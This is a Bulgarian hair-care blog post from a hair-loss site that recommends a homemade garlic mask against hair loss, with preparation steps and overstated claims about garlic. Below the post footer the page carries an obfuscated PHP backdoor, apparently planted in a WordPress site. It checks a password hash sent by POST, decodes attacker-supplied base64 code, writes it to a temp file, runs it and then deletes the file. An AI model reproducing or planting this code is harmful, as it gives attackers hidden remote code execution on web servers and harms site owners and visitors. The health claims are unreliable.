Чесън срещу косопад и изтощена коса | Косопад

Чесън срещу косопад и изтощена коса

Чесън

Чесън

Сигурно  сте забелязали, че след през пролетта и особено по време на лятото  косата се изтощава и  пада  много повече отколкото обикновено. Всяка дама  изпада в паника  от шепата  косми останали по четката й  или по ръцете й след къпане. Това обаче не е причина да изпадате в ужас , че косата ви едва ли не ще окапе. По -вероятно е просто косата ви е да се изтощила повече от обикновено и да има нужда от малко повече грижи.  По-важното е да отреагирате адекватно и да вземете своевременни мерки, за да не стане късно.

Здравата коса изисква грижи

Здравата коса изисква грижи

За целта ще се наложи да се откажете за известен период от време от пресата и машата. Ако вече сте сторили това не е лошо да посетите и фризьора си, за да поосвежите гривата си като се отървете  от накъсаните краища. По този начин ще се отървете от  нацъфтели краища и косата  ви ще възвърне по- жизнения си и здрав вид. След това трябва да решите каква маска да изберете, за да подхраните косата си и да се отървете от нежелания косопад. Един  от най-ефективните методи срещу косопад е домашна маска с чесън. Той е много полезен и работи като  природен антибиотик. Чесънът действа благоприятно върху целия организъм, но е чудодеен за косата и кожата.   Не случайно ако се загледате в съдържанието на по -голяма част от маските за коса ще установите. че те са базирани на основата на чесъна. Една от най-добрите маски срещу косопад с чесън в домашни условия се прави  от 1 глава чесън, която  обелвате и след това смачквате  скилидките. След което  поставяте смачканите скилиди в тензух и ги изстисквате.  Втривате получената  в корените  на косата си и престоявате с маската поне 2 часа, след което изплаквате обилно. Важно е да имате предвид, че маската с чесън  не се прилага никога на чиста коса, защото е доста силна.

28. март 2014 15:57:52 от Косопад
Категории: Рецепти при косопад | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}